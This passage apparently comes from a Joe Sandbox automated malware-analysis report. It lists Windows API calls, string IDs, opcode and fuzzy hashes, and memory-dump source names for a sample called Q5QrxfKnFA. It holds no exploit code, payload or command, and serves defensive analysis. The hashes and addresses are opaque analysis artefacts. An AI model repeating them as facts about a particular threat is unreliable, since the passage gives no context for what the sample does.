                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 06bdf1b5f374b6a7d0d4a5da5b0387757bae1b4733c5221a5f61cd8e7b475627
                                                        • Instruction ID: 55b80bd0b453ffb13622150ea97b62481f932e370d0e81e91cc7fc6ba4be47c0
                                                        • Opcode Fuzzy Hash: 06bdf1b5f374b6a7d0d4a5da5b0387757bae1b4733c5221a5f61cd8e7b475627
                                                        • Instruction Fuzzy Hash: AE51BE325087059FC706EF14C892AAFB7E9EF86340F01482DF5959B2A2DB71ED09CA53
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: 2558259fd539129fdb4059c104f413e8ed2a709336f77db2da2b804a34b53da1
                                                        • Instruction ID: 7650405ea6f02e3db15d176c0e2266ba7a3c5a49eb8e67bf7a39ccd09f1a0660
                                                        • Opcode Fuzzy Hash: 2558259fd539129fdb4059c104f413e8ed2a709336f77db2da2b804a34b53da1
                                                        • Instruction Fuzzy Hash: 3541C771604609AFDB26DF38D842F7B73E8FF46310F20846EE549DF295EA35A9418B10
                                                        APIs
                                                        • _memset.LIBCMT ref: 003C716A
                                                        • CreateMenu.USER32 ref: 003C7185
                                                        • SetMenu.USER32(?,00000000), ref: 003C7194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7221
                                                        • IsMenu.USER32(?), ref: 003C7237
                                                        • CreatePopupMenu.USER32 ref: 003C7241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C726E
                                                        • DrawMenuBar.USER32 ref: 003C7276
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: c9ff0a714225e88eb7b4ddb7995775d4b4045bc64c5a7e89993d6ca7b141bd83
                                                        • Instruction ID: 197ea64df4543893cb0cb2f54e73674332effbce5606847c29a5af8e52f63b7b
                                                        • Opcode Fuzzy Hash: c9ff0a714225e88eb7b4ddb7995775d4b4045bc64c5a7e89993d6ca7b141bd83
                                                        • Instruction Fuzzy Hash: 50412276A01205AFDB22DF64D988F9ABBB9FB49350F154429FE05A7360D731A910CF90
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003C755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 003C7565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003C7578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 003C7580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 003C758B
                                                        • DeleteDC.GDI32(00000000), ref: 003C7594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003C759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003C75B2
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003C75BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: 35707571c8a4049822fee9f570a8ef02d74fd7ad13b332d8c5e0d62159997c64
                                                        • Instruction ID: b047481bed092e0247e89491e51342982fa342ec871465ee2714490fde789d12
                                                        • Opcode Fuzzy Hash: 35707571c8a4049822fee9f570a8ef02d74fd7ad13b332d8c5e0d62159997c64
                                                        • Instruction Fuzzy Hash: 28314772104214AFDF129F64DC09FEA3B6EEF0A764F110228FA15E61A0C731EC21DBA4
                                                        APIs
                                                        • _memset.LIBCMT ref: 00366E3E
                                                          • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                                        • __gmtime64_s.LIBCMT ref: 00366ED7
                                                        • __gmtime64_s.LIBCMT ref: 00366F0D
                                                        • __gmtime64_s.LIBCMT ref: 00366F2A
                                                        • __allrem.LIBCMT ref: 00366F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00366F9C
                                                        • __allrem.LIBCMT ref: 00366FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00366FD1
                                                        • __allrem.LIBCMT ref: 00366FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00367006
                                                        • __invoke_watson.LIBCMT ref: 00367077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: 63fe0e407e3f9aab3eab1a28dc02c798cc23de3780d2f8a4bca129e48f47208b
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: 0C712776A00717ABD726EF78DC42B6AB3A8AF04364F10C229F514DB285E775ED0087D0
                                                        APIs
                                                        • _memset.LIBCMT ref: 003A2542
                                                        • GetMenuItemInfoW.USER32(00405890,000000FF,00000000,00000030), ref: 003A25A3
                                                        • SetMenuItemInfoW.USER32(00405890,00000004,00000000,00000030), ref: 003A25D9
                                                        • Sleep.KERNEL32(000001F4), ref: 003A25EB
                                                        • GetMenuItemCount.USER32(?), ref: 003A262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 003A264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 003A2675
                                                        • GetMenuItemID.USER32(?,?), ref: 003A26BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003A2700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2735
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: eacb7c5234d182423b62311f994b890ee150f8377103e118a06ed4f75eaea941
                                                        • Instruction ID: b95a47205276f14b23710dedd83759b433c2717eb894ffcb2b8d2a58c8f537c5
                                                        • Opcode Fuzzy Hash: eacb7c5234d182423b62311f994b890ee150f8377103e118a06ed4f75eaea941
                                                        • Instruction Fuzzy Hash: 68617E70901249AFDB13CF68DD88DBFBBB9FB46304F150069E941A7261D771AE05DB21
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C6FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C6FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C6FCC
                                                        • _memset.LIBCMT ref: 003C6FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C6FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C7067
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 075c66e2b664a909f7cf6d3d82a08d62941d820e9db9917ec5f6f3382156b4aa
                                                        • Instruction ID: dbe5d898dfed1ecdeb4e1bf761b0374dd5cb07be4e9d7bb459d2d9923ed2c70c
                                                        • Opcode Fuzzy Hash: 075c66e2b664a909f7cf6d3d82a08d62941d820e9db9917ec5f6f3382156b4aa
                                                        • Instruction Fuzzy Hash: DC612575900208AFDB12DFA4CD81FAE77B8EB09710F14416AFA14EB2A1C771AD51DFA4
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00396BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00396C18
                                                        • VariantInit.OLEAUT32(?), ref: 00396C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00396C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00396C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00396CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00396CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00396CD3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00396CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00396CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00396CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 0dec09fe181b2ef052c1e603d985c41d434d0c30935b3177feb7863866e665c4
                                                        • Instruction ID: 5be6d5ba901adb7eaa02ecac96095fdce9503d7d0304b3853425f9c758982808
                                                        • Opcode Fuzzy Hash: 0dec09fe181b2ef052c1e603d985c41d434d0c30935b3177feb7863866e665c4
                                                        • Instruction Fuzzy Hash: BC415E71A002199FCF06EFA9D845DAEBBB9EF08354F008069F955EB261DB30A945CF90
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 003B5793
                                                        • inet_addr.WSOCK32(?), ref: 003B57D8
                                                        • gethostbyname.WSOCK32(?), ref: 003B57E4
                                                        • IcmpCreateFile.IPHLPAPI ref: 003B57F2
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B5862
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B5878
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003B58ED
                                                        • WSACleanup.WSOCK32 ref: 003B58F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 3736172ef7af3b7b5233bd33d37f3b34cd45c31e6abc9c258b6ff812a720da44
                                                        • Instruction ID: 36628747b76c664398c8cba7019e1e6cd326a5a44e9901fac8e7e1c7e45239e1
                                                        • Opcode Fuzzy Hash: 3736172ef7af3b7b5233bd33d37f3b34cd45c31e6abc9c258b6ff812a720da44
                                                        • Instruction Fuzzy Hash: 955171316047009FDB12EF25DC46B6AB7E8EF48714F05492AFA56DB6A1DB70E800DF52
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 003AB4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003AB546
                                                        • GetLastError.KERNEL32 ref: 003AB550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003AB5BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: b6f8e34d88b4a5e424b242ebfb3cfb3ae1afd7dc4995968ffc70fbab0e14bd60
                                                        • Instruction ID: 5a170e2afe5cb79cc1f410d4ac8b507a33b49f07de32578dc28d46858039c882
                                                        • Opcode Fuzzy Hash: b6f8e34d88b4a5e424b242ebfb3cfb3ae1afd7dc4995968ffc70fbab0e14bd60
                                                        • Instruction Fuzzy Hash: 83316035E002099FCB16DBA8C845EBEBBB8EF4B310F154166E505DB292DB71AA42CB51
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00399014
                                                        • GetDlgCtrlID.USER32 ref: 0039901F
                                                        • GetParent.USER32 ref: 0039903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0039903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00399047
                                                        • GetParent.USER32(?), ref: 00399063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00399066
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 028bcc1afa895cf7558a128a14ce5fe5208b21f52ddda1d60f0377bf9b0ba568
                                                        • Instruction ID: 88f8004a481a7719fa3215d966ffea81ec4db5a320d420626277568bf7e54843
                                                        • Opcode Fuzzy Hash: 028bcc1afa895cf7558a128a14ce5fe5208b21f52ddda1d60f0377bf9b0ba568
                                                        • Instruction Fuzzy Hash: 65219B75E00108BFDF06ABA4CC85EFEB7B9EF49310F10415AF5619B2A1DB755825DB20
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003990FD
                                                        • GetDlgCtrlID.USER32 ref: 00399108
                                                        • GetParent.USER32 ref: 00399124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00399127
                                                        • GetDlgCtrlID.USER32(?), ref: 00399130
                                                        • GetParent.USER32(?), ref: 0039914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0039914F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: d9f9c754aded1eed0e0b049011167e0a2afef0ffcccd79c83c0ac35501a48a4d
                                                        • Instruction ID: d533b781a16a531ce7c48b61d68e13a2f4a44f2f6cd4130a96457888641bf104
                                                        • Opcode Fuzzy Hash: d9f9c754aded1eed0e0b049011167e0a2afef0ffcccd79c83c0ac35501a48a4d
                                                        • Instruction Fuzzy Hash: 1621B675A00109BFDF02ABA4CC85EFEBBB9EF49300F10411AF5519B3A2DB755815DB21
                                                        APIs
                                                        • GetParent.USER32 ref: 0039916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00399184
                                                        • _wcscmp.LIBCMT ref: 00399196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00399211
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: 47e2321728f7c5905ccca153fb94f611036dee6de87c5ca409acf2ebb4c37486
                                                        • Instruction ID: 958137ad29088aa597d343349a24efbb244c0353144134d7e801d2812c651800
                                                        • Opcode Fuzzy Hash: 47e2321728f7c5905ccca153fb94f611036dee6de87c5ca409acf2ebb4c37486
                                                        • Instruction Fuzzy Hash: 3311CA3A24870BB9FE232728DC06EF7379C9B15760B21442BFA00E54D6EFA268615A54
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003A7A6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: b2d0785e525ac49a71b1207e01712b3c8c652ac13f3ca3974aede35365da9e42
                                                        • Instruction ID: 9ec6aa3c4f5a3f4968195dc38e9f37546e79b260b056a7e05e5c3a3dcff87197
                                                        • Opcode Fuzzy Hash: b2d0785e525ac49a71b1207e01712b3c8c652ac13f3ca3974aede35365da9e42
                                                        • Instruction Fuzzy Hash: 4EB16C71A0421A9FDB12DFA4CCC5BBEB7B9EF0A321F254429E541EB251D734E941CBA0
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0034FAA6
                                                        • OleUninitialize.OLE32(?,00000000), ref: 0034FB45
                                                        • UnregisterHotKey.USER32(?), ref: 0034FC9C
                                                        • DestroyWindow.USER32(?), ref: 003845D6
                                                        • FreeLibrary.KERNEL32(?), ref: 0038463B
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00384668
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 2b4eb1ff056c197fad66da1551912d746f9de48832986b9231f5a2254fc4ed2b
                                                        • Instruction ID: 43795fb01d298621d0bcee262aa5de89b0003b1220b3bdbb19fbad8c2f7fb1fc
                                                        • Opcode Fuzzy Hash: 2b4eb1ff056c197fad66da1551912d746f9de48832986b9231f5a2254fc4ed2b
                                                        • Instruction Fuzzy Hash: 19A14A31701212CFCB2AEF14C995E69F7A5AF05710F5542ADE80AAF662DB30ED16CF90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
